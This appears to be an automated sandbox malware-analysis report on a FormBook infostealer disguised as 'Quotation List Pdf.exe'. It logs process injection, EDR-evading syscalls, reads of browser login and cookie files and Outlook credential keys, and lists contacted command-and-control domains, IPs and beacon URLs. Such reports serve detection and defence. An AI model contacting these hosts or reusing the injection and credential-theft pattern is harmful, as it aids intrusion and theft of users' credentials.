Source: C:\Windows\SysWOW64\PING.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\PING.EXE Thread register set: target process: 4788 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\PING.EXE Thread APC queued: target process: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\System32\svchost.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\System32\svchost.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\regedit.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\regedit.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 511C008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe" Jump to behavior
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" Jump to behavior
Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE" Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76849BDA4 cpuid 0_2_00007FF76849BDA4
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: GetLocaleInfoEx, 0_2_00007FF768500D30
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF76849BA10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF76849BA10

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\PING.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465353 Sample: Quotation List Pdf.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 34 www.ngkwnq.xyz 2->34 36 www.ajjmamlllqqq.xyz 2->36 38 17 other IPs or domains 2->38 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 54 5 other signatures 2->54 10 Quotation List Pdf.exe 1 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 36->52 process4 signatures5 66 Writes to foreign memory regions 10->66 68 Allocates memory in foreign processes 10->68 70 Injects a PE file into a foreign processes 10->70 13 vbc.exe 10->13         started        16 conhost.exe 10->16         started        18 svchost.exe 10->18         started        20 regedit.exe 10->20         started        process6 signatures7 72 Maps a DLL or memory area into another process 13->72 22 tiwTBKVufjvhPL.exe 13->22 injected process8 signatures9 56 Found direct / indirect Syscall (likely to bypass EDR) 22->56 25 PING.EXE 13 22->25         started        process10 signatures11 58 Tries to steal Mail credentials (via file / registry access) 25->58 60 Tries to harvest and steal browser information (history, passwords, etc) 25->60 62 Modifies the context of a thread in another process (thread injection) 25->62 64 3 other signatures 25->64 28 tiwTBKVufjvhPL.exe 25->28 injected 32 firefox.exe 25->32         started        process12 dnsIp13 40 www.mycaringfriend.online 3.33.244.179, 49713, 49714, 49715 AMAZONEXPANSIONGB United States 28->40 42 www.marttyes.top 203.161.41.207, 49717, 49719, 49720 VNPT-AS-VNVNPTCorpVN Malaysia 28->42 44 8 other IPs or domains 28->44 74 Found direct / indirect Syscall (likely to bypass EDR) 28->74 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
38.47.207.94
 te74y.top United States
174 COGENT-174US false
35.244.172.47
 www.ajjmamlllqqq.xyz United States
15169 GOOGLEUS false
188.114.97.3
 www.evoolihubs.shop European Union
13335 CLOUDFLARENETUS false
76.223.105.230
 eoghenluire.com United States
16509 AMAZON-02US false
38.47.232.185
 yvw66.top United States
174 COGENT-174US false
203.161.41.207
 www.marttyes.top Malaysia
45899 VNPT-AS-VNVNPTCorpVN false
35.241.41.54
 www.ngkwnq.xyz United States
15169 GOOGLEUS false
3.33.130.190
 sponsoraveteran.info United States
8987 AMAZONEXPANSIONGB false
81.88.48.71
 aquamotricidad.com Italy
39729 REGISTER-ASIT false
3.33.244.179
 www.mycaringfriend.online United States
8987 AMAZONEXPANSIONGB true

Contacted Domains

Name IP Active
www.evoolihubs.shop 188.114.97.3 true
sponsoraveteran.info 3.33.130.190 true
www.ngkwnq.xyz 35.241.41.54 true
www.ajjmamlllqqq.xyz 35.244.172.47 true
www.mycaringfriend.online 3.33.244.179 true
aquamotricidad.com 81.88.48.71 true
www.marttyes.top 203.161.41.207 true
poodlemum.com 3.33.130.190 true
fundraiserstuffies.com 3.33.130.190 true
te74y.top 38.47.207.94 true
eoghenluire.com 76.223.105.230 true
yvw66.top 38.47.232.185 true
www.eoghenluire.com unknown unknown
www.yvw66.top unknown unknown
www.aquamotricidad.com unknown unknown
www.te74y.top unknown unknown
www.sponsoraveteran.info unknown unknown
www.fundraiserstuffies.com unknown unknown
www.poodlemum.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.marttyes.top/o2rg/ false
  • Avira URL Cloud: safe
 unknown
http://www.ngkwnq.xyz/44zl/ false
  • Avira URL Cloud: safe
 unknown
http://www.yvw66.top/e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.te74y.top/fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.fundraiserstuffies.com/vapn/ false
  • Avira URL Cloud: safe
 unknown
http://www.mycaringfriend.online/4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN true
  • Avira URL Cloud: safe
 unknown
http://www.eoghenluire.com/jtz4/ false
  • Avira URL Cloud: safe
 unknown
http://www.ngkwnq.xyz/44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.yvw66.top/e5ni/ false
  • Avira URL Cloud: safe
 unknown
http://www.fundraiserstuffies.com/vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.ajjmamlllqqq.xyz/5lw2/ false
  • Avira URL Cloud: safe
 unknown
http://www.sponsoraveteran.info/v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.mycaringfriend.online/4xhu/ true
  • Avira URL Cloud: safe
 unknown
http://www.marttyes.top/o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.aquamotricidad.com/8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.sponsoraveteran.info/v1kj/ false
  • Avira URL Cloud: safe
 unknown
http://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.aquamotricidad.com/8lwi/ false
  • Avira URL Cloud: safe
 unknown
http://www.poodlemum.com/17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.te74y.top/fuua/ false
  • Avira URL Cloud: safe
 unknown
http://www.ajjmamlllqqq.xyz/5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown
http://www.poodlemum.com/17ef/ false
  • Avira URL Cloud: safe
 unknown
http://www.eoghenluire.com/jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN false
  • Avira URL Cloud: safe
 unknown